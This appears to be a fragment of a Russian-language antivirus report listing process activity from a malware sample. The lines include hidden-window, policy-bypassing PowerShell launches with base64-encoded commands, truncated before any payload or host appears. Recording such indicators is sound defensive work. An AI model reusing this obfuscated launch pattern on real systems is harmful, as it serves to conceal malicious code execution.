Техническая информация
- '<SYSTEM32>\cmd.exe' /C POwERsheLL.EXE -Ex bYPass -NoP -w 1 -EC IAAJAAkACQAJAAkACQAJAAkACQAJAFsAbgBFAFQALgBzAEUAUgBWAGkAYwBFAHAAbwBpAG4AdABNAGEAb...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1508
- %TEMP%\985208.cvr
- '<SYSTEM32>\cmd.exe' /C POwERsheLL.EXE -Ex bYPass -NoP -w 1 -EC IAAJAAkACQAJAAkACQAJAAkACQAJAFsAbgBFAFQALgBzAEUAUgBWAGkAYwBFAHAAbwBpAG4AdABNAGEAb...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Ex bYPass -NoP -w 1 -EC IAAJAAkACQAJAAkACQAJAAkACQAJAFsAbgBFAFQALgBzAEUAUgBWAGkAYwBFAHAAbwBpAG4AdABNAGEAbgBhAGcAZQBSAF0AOgA6AFMAZQB...